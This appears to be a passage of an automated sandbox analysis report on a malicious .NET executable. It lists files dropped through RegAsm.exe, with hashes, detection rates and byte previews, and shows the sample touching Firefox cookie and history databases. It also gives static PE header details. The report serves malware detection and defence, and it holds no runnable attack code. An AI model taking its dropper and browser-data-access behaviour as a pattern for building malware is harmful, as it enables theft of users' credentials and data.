SHA1:	328CECD696E6C5FC02771FF9F89408639EA02A25
SHA-256:	978A30813E8487AB033A712C9DE13F5F3BEBE494D497E3267AD19D680536CCDC
SHA-512:	8555EBCAC62F4A7C22CAC852B4A2106D6B929325F1D5B67205E030836A1DD9479934D5A73804096CD024347A2300EE1716B136CB045C35EE72045A46E4F107C9
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ......\.....}.\....-.AQ............................4.:..DG..Yr?.D..U..k0.&...&.......$..S...8.A....0y(]........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2$Y.\|...........................^.A.p.p.D.a.t.a...B.P.1.....$Y.\|..Local.<......EW<2$Y.\|....[......................-..L.o.c.a.l.....N.1.....$Y.\|..Temp..:......EW<2$Y.\|....^.....................w...T.e.m.p.....f.1.....$Y.\|..POWERE~1..N......$Y.\|$Y.\|.....,.....................E..P.o.w.e.r.E.x.p.e.r.t.N.N.T.....r.2.....$Y.\| .POWERE~1.EXE..V......$Y.\|$Y.\|....J-........................P.o.w.e.r.E.x.p.e.r.t.N.N.T...e.x.e.......u...............-.......t...........?..y.....C:\Users\user\AppData\Local\Temp\PowerExpertNNT\PowerExpertNNT.exe....P.o.w.e.r.E.x.p.e.r.t.N.N.T.>.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.P.o.w.e.r.E.x.p.e.r.t.N.N.T.\.P.o.w.e.r.E.x.p.e.r.t.N.N.T...e.x.e.........\|....I.J.H..K..:...`.......X.......302494...........hT..CrF.f4... .)..Jc...

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10902016
Entropy (8bit):	7.966543494488889
Encrypted:	false
SSDEEP:	196608:+Oix0DABAAtXftiAf6xz1Z5PVm6Gcj+TqnC6fOaSz/n2EgfY0gEMtw1:QOcXfC7bE9fjCfY0gg
MD5:	025EBE0A476FE1A27749E6DA0EEA724F
SHA1:	FE844380280463B927B9368F9EACE55EB97BAAB7
SHA-256:	2A51D50F42494C6AB6027DBD35F8861BDD6FE1551F5FB30BF10138619F4BC4B2
SHA-512:	5F2B40713CC4C54098DA46F390BBEB0AC2FC0C0872C7FBDFDCA26AB087C81FF0144B89347040CC93E35B5E5DD5DC102DB28737BAEA616183BEF4CAECEBFB9799
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...0..f..........#.................o..........@.......................................... ....................................................<...........@S..`*..........................................P...(....R..8............ .. ............................text............................... ..`.rdata.. ...........................@..@.data...............................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0...:(......................... ..`.text1..X.... ......................@....text2...M...0...N..................`..h.rsrc................T..............@..@........................................................................................................................................................................................................................

C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	8684256
Entropy (8bit):	7.036585407539768
Encrypted:	false
SSDEEP:	98304:yvOB51QmIWth3e1PTbEYBkQyShbkqdwOyAuYJvdVuWFY:y+51/Iqh3e1PTbE7QbCqeYbM8
MD5:	B5887A19FE50BFA32B524AAAD0A453BC
SHA1:	CD1F3905959CD596C83730A5B03CEEF4E9F2A877
SHA-256:	FCE5CBEEC1EB5274FC3AFA55E57FB2F724688CB9D4661A8A86716011493564C7
SHA-512:	5B9914C94101B53314B14335E687552E5DA0A4085AFB826AE94F45769E9B1E66A35624B6E6B60257514F4ADF2ACC5C9E048BFA3A24AAFB891D203E3011C02538
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 67%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....P..............................&... ...@....@.. ....................... ......I.....@..................................&..K....`.............................6&............................................... ............... ..H............text........ ...................... ..`.sdata.......@......................@....rsrc.......`......................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	290344
Entropy (8bit):	7.980772850522231
Encrypted:	false
SSDEEP:	6144:UmCasy4lZs8PdTTuC9RKXAmlxp5T9iynBw496NlRlEO:UCsVs8lThUBxp6+n9YRlEO
MD5:	6F99968CC27D2D6A07A921AB703A5D5D
SHA1:	1B1F72A9CA325B2D7B01F66AE1EBEF646B167EC0
SHA-256:	5EF282479F0C6F082F15D3F878F8C4B418259EBC6D7941A472E0F28CDCC43C88
SHA-512:	3EA9CBBB6AB281C02AEF8473F40EC00412A05B613D4A45E228E06F4A585AE25BA35DC2EB2A772CF9AB38E86A05B67A4388B4EF306483EF030666D1C242BA370A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................<..........~Z... ...`....@.. ..............................1H....`.................................$Z..W....`...............H..(&...........X............................................... ............... ..H............text....:... ...<.................. ..`.rsrc........`.......>..............@..@.reloc...............F..............@..B................`Z......H........L..,............................................................^3..]....B..3..H1^.`aV..j.(X..`.vK)..gA.W....}<..<L........%..}x.31.t.r.:.]...a#..!.U..q....1~..@.....X.(......Lj..D....A......D.w.k.s...E&...L:......i....AD.l..;..8.V....P.VZo.$.~..:....k.....i.......ho........lb.DB.O..I.v.Ks".[.IO..X.2$q.......3..f........a..X.;..(..8f..j.#.k..g.g...P.%......<A.E.b...!.]UH~...0aY.}....!>....M.../&.K'.....N..._.C6.h. z.j......o...F5...`.!.d"p.%..

C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	528896
Entropy (8bit):	7.995705966316978
Encrypted:	true
SSDEEP:	12288:HiI9LiGtFBsoR1UJdFpzz0b+fzV4ULweVBBP0bK4WHL/Ff5qTkfozd:HieFBXRqJDpzE+LVfXVkbK4WlAvd
MD5:	D8ECB462D3046A0EE172551C5D505C8E
SHA1:	54F9E16B497579964E9AFC90C3C0C208F16B4418
SHA-256:	AFB9EDBF499A4726D798CDA9F0F372B4B1019033B68D5EB87A8A83ECB7463D6F
SHA-512:	9EED44C24A71B44E90EFC853B75D2103FAA3F8518E1EFAD45C8C4733EE0396C51E8EA11BA6E7D2AC4F30234E6380C3325227CCED8D1753373581EB45073C012E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................'... ...@....@.. ....................................`.................................t'..W....@.......................`......<&............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H...........l............................................................&f..;.JJ.s}./...1.l.2E..a.....}.py..xzZ.@l....{C.$.t....9sK........n...~...M[P...TBNi.#.}.j.}.S@kr.#..G.B.^.......}......T1..#..'..cQb6..k;.1..^.&.D.;....kXS.x.NTE.(/.h.....1..2+5..Pv...@...../=..?Q..,.....v7p...#d....a..8.y.......m.~Cs...N1y...0.i...9...E...>V.Q......Z.?M\..2]7..)Z".`=.Q.yF.....A3........j1j....=.e..NA.2...6....RC../cQ.0...$.OS..+.ZA}B....hMs.....p....z.....w$R..H.L...

C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1760552
Entropy (8bit):	7.909438005215774
Encrypted:	false
SSDEEP:	49152:eo2sTMKEpK0Y6d84LE1pM5bK0dRfBp8N6eopiaj7EvwtCpLdiXr9fpJ2M67:l2sTMKEpK0Y6dTE1pM5bK0dRfBp8N6eL
MD5:	1959CE1E98B798963F8B7D04BFB71E69
SHA1:	3F2FB337CA2F2686E55B985E1F4020E2273BC5A8
SHA-256:	D480B6EFCF1CCDC3A7CF4C1D22839E27E9701758B19C0A197B049B66BDCFE870
SHA-512:	8E736A00B4077D32E11C6AE100D4148033C5B6BDBB2A874F707C3315DB5AC61798CC310198AAC97F4C29AE04F45D34E0A2D45A57CB43BD5536E7F3199ADD3E8C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 16%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......aKZe%46%46%46,R.6&46,R.6446%56.46>..6+46>..6$46>..6$46Rich%46........PE..L.....GO.................p....>..B...8............@..........................pL...........@.................................4........0G............. ....Q....?.H....................................................................................text....o.......p.................. ..`.rdata..b.......,...t..............@..@.data....f>.........................@....ndata....... ?..........................rsrc........0G.....................@..@.reloc...2...0L..4..................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1776640
Entropy (8bit):	7.943135847110618
Encrypted:	false
SSDEEP:	24576:2UkkOen5PszcQtNe6ASlqAZqlVn0/SbGvAlWV3sxt3p3JQ1kG7BGjH15VYlakt:2Ukyn5URhZqvr8cxtZ32/Gp5VYlakt
MD5:	8C673503632E93C08931CD68E7476E9C
SHA1:	5775FE0502763BD919B6A80CCCE9A46DE0545630
SHA-256:	EB61EFF74696041F1BB1773C85B99F2F4005C1EC3A1F2F47707BE41AED40714A
SHA-512:	1BFA2AF7B1CCD0B37166CA9BD27CF4D6C2406C11F7E4492B7C122E6E70A6C5277DF487F3FE718E03ABD5FC0489F025899A82D8689E2B306576D4AB617C3CDF6C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 34%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L...M..f.....................B"......pg...........@...........................g...........@.................................P.#.d.............................#..................................................................................... . ..#......<..................@....rsrc ......#......L..............@....idata ......#......L..............@... ..)...$......N..............@...tmvaidtc......M......P..............@...vymybyyn.....`g.....................@....taggant.0...pg.."..................@...................................................................................................................................................................................................................................................

C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3851776
Entropy (8bit):	7.219526676113136
Encrypted:	false
SSDEEP:	49152:3JawLbHv2lgbLsuyYHlt8Ui4fhn5IjD0iCT:3XbH573t8aZ5
MD5:	68EBCC4AD727C077AEB5CC60B868E304
SHA1:	255944DC0D24D22DFA36613C2B68AA81070AF1C5
SHA-256:	D83C67E9AAC5D88DA1C30AB4D05BB0AD08358532D298E8CF60B9D8798C262CE4
SHA-512:	ADF77B744A294512FD1E448C91E4B9520389E3F6781C2A2E8B07F71AC0C7D606C54208A5741F6DB0B33E7AE3235E4E458835B931C41F251D2AFDDE71BD9ED7F9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....83...................)...........).. .......@.. ....................... ;...........@.................................P.).K.... .......................;.......).............................................. ............... ..H............text.....).. ....)................. ..`.sdata...............).............@....rsrc........ .......).............@..@.reloc........;.......:.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	14748160
Entropy (8bit):	5.890118791520016
Encrypted:	false
SSDEEP:	98304:YrVuOrsnJc5nIsvSutn0RejfWlvmSN1BM9lu9vQ1MeLYVqita:NZU0RplJeLet
MD5:	EF210F3D8E05ECAFD8D41A98B5806218
SHA1:	90AD9BA808225F2F3B6AC61F73662D332F4D5C7A
SHA-256:	AFA3196B3C2D0CC7BC921D98D60409D043F7C93CB760C30DBD691A20FA4B1E71
SHA-512:	78184D1F03C4963755EF7C954D67B8F4C5C024EFEF53F5F763D040835139CEB5E13BF8A4DB0CEDE9AC02342A6DE89B0EC166B31E6CC35A9442B4C2A0DB30C0D3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 75%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........4................`..........\|.......@....@.................................VU....@.....................................L...............................\...................................................@V...............................text...(.`.......`................. ..`.rdata..,.p...`...p...`.............@..@.data....w...@....... ..............@....idata..L............2..............@....reloc..\............8..............@..B.symtab..............4.................B.rsrc................6..............@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	210984
Entropy (8bit):	7.967969563341901
Encrypted:	false
SSDEEP:	3072:IGNK/MDJQpb1hCXS+l7kEHLZwX0wfSbGohq2tSBNhwzGA3Mx62lWfskZCfZKYzEO:IGgE+hCC+pFGrqiolQBIzJL2leZCzEO
MD5:	998F7FB6068E4377618BCDB2138BC6F0
SHA1:	2339B59C00BBE3707926A0F4A5964B5E76D18D57
SHA-256:	15A0DA7DFCCB96D1A46F5EEF42CEAA7FCB49DA5C88E32FC78921D6A9B20F12BE
SHA-512:	D0896F66AA2422C467DAA57612AFDF4DFFACA1B788EE4F34ECF6F15225AAFE879142E9D3BAC4DB584BCFE9BB8AD47A32C26C9EA0DC7E04370251EAC64D4BC9D6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................~$... ...@....@.. ..............................S0....`.................................$$..W....@..................(&...`......."............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`$......H...........,.............................................................ML.U.._.&.D..X5q........M-.N4..hBK+d.60...T..S...TXq.S..Ca}..&.iA....[7......F........m...K.Sl....)I}[..9.R.....z..2.(..CZ.`>.......a.FR.1..$.....T..@Sm3..I.q.PD27>Sc [H.O.1..J{...3...h.......K.x(..<O\....so..r..A4}..)w..)..lE...1.(.?....RA......EWa`...l......;&6.....2S..W..l.)B;].<..^J..X\~....Z.{..8.8B.5..2..'.vJ...P....\.d.oi+..,..\|co....hY...?...[......R.....'.s6..._...r......i

C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6535168
Entropy (8bit):	6.4528704461092055
Encrypted:	false
SSDEEP:	49152:n+7S4ol3ok8PfHvlCyLFT3+trvK4oUZOjrOvKEfRMc4gjSlgVbAxhcApTzaYhEqM:+7/ol8/lNx+ArOE6VbAxhJpTWcV6
MD5:	0DE88C2F978A57026E58E6CA90AE5D69
SHA1:	E066A32F87292B1C50BCEC3064E76F4FC0781D1A
SHA-256:	FAB479CC1E503225BE39C710A3555DB1AE1F6D6ACFB0504B715D2284F75E3527
SHA-512:	47FD6CDD95E6D08C59340B4E00FE97C4BB987CD2C11628DEDA02CD59C5739E990F9C94FADCA37E4B7C8ADB9CAFBAE12B69F20B569457078C159BBCB180F9163F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........b..............V..........0+........\...@...........................f......d...@...................................b.L....Pe..%....................c..=....................................................\..............................text....U.......V.................. ..`.rdata..."...p...$...Z..............@..@.data...@G....\......~\.............@....idata..L.....b......L`.............@....reloc...=....c..>...R`.............@..B.symtab......@e.......b................B.rsrc....%...Pe..&....b.............@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	320512
Entropy (8bit):	7.985351724503873
Encrypted:	false
SSDEEP:	6144:tSS+SfXno/QxiNbuW22FoiU4eAy9i3nzbtvNDNsw:99PqBuW2dHwHxNDNsw
MD5:	6B19E5C100DB0812FFB7813A1503C05D
SHA1:	17032C0B1B056BEC3F23786BAD5AA17404DE3297
SHA-256:	516B1A67A3AAFCEADFF083854B26512174CBED4D455C5D8F8993ACC8A895EA2E
SHA-512:	FB97BD74AAE13CB4D0205CF704300DFC4F0678DCBD07AACC295BC13B666A4BFF46F12786C2D37702A7A783E786A6A92DF31DF37A39EBCAEE74D46C58E0C4E27C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 34%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... .f............................~.... ........@.. .......................@.......l....`.................................$...W............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................`.......H...........,...........................................................,....p`.=(..B.1......V.A.Lf......pE?..'.v.kz.G/OL...*.8OO.5.0RS...p..J....$..n\|..^..v..\|}.T.[cr$kAw....k\|.lP2...........U.6f$.o.k....IM........J......01....~.....h~.....Y....r.:/....[0..c..A.]....cE.z4....RG.G.....\|.(EYJ.e.~...h...X...v..%..6...}....O.}.<:.....L.A.`.c..3...!..]./.}p...8...@LB.>..Nh.>!i.Z.....0}. .o..#...6..:<..0pm~:aL..q..`...[k..Tj...@(..'.. ...`.D5..._.{...1..O.9l...S.K.k.

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.469245665513219
Encrypted:	false
SSDEEP:	6144:YzZfpi6ceLPx9skLmb0fQZWSP3aJG8nAgeiJRMMhA2zX4WABluuN1jDH5S:OZHtQZWOKnMM6bFprj4
MD5:	17237B58566D292FA6C8254EBCD355AF
SHA1:	D62469E3B9DD70FF7B8369E5122164BF6F74C07F
SHA-256:	B01E9D6D2ACC35ED2A757D796836F5B7A20C59CAA3C1A1A264BA74635DC9C196
SHA-512:	C813DF9305103DA50776D52F5AE7FD66B71B2DA0DB9077014413AF6BCECEDD7F0A317EB0DB034BCED9FCA93AEBDCA21777AE529109021681CA60A156D2E93595
Malicious:	false
Reputation:	unknown
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmr..Y................................................................................................................................................................................................................................................................................................................................................4..m........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.304046957369696
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.69% Win32 Executable (generic) a (10002005/4) 49.64% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% InstallShield setup (43055/19) 0.21% Windows Screen Saver (13104/52) 0.07%
File name:	FileApp.exe
File size:	9'522'176 bytes
MD5:	84fb9da5b4879a284fe19a1635d9ee39
SHA1:	6e7156eb87e3e376ae128eb40e1cc365ad80467e
SHA256:	45bd836cdf29ad666cc785f6df5e9ff0e43e9cb63ff06aca339fdb1f3ddbfa34
SHA512:	e5440203ddf1974556295fe2fd61be3ef2c5a8e98c519d0e817f238d9d1727659d6d9f5e23119426e02ef5f72aa19cad4633a8bfe07b35535db3ec89dbc8c6f6
SSDEEP:	98304:GMzgISSXaYGFQime2hKRculpYX8GRlwc2h00SQDFaFue:G4SGaRFb3TlpYlwcODFaI
TLSH:	9CA6AF127F40DD05D12A4636CC9F9FE443E8E9872222DA363849F6C979D177E2B1F18A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{...................&..."......ND... ...`....@.. ....................................@................................

File Icon


Icon Hash:	6ec0e0d0ce72c034

Static PE Info

General

Entrypoint:	0xcb444e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xE7847BAD [Sat Jan 31 05:48:29 2093 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8b4400	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8b8000	0x61ace	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x91a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8b43ba	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x8b2454	0x8b2600	0c3433eee40915aaa794073742bcdd45	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata	0x8b6000	0x2a0	0x400	b426f7aab4663c5b235df62287427b6e	False	0.5263671875	data	4.604014335110788	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x8b8000	0x61ace	0x61c00	d148c682aeecfd5c5e1b87664d856ac3	False	0.44995554267902815	data	6.616075492644763	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x91a000	0xc	0x200	44f7b08b2187ba73105ef98ebebfdb98	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
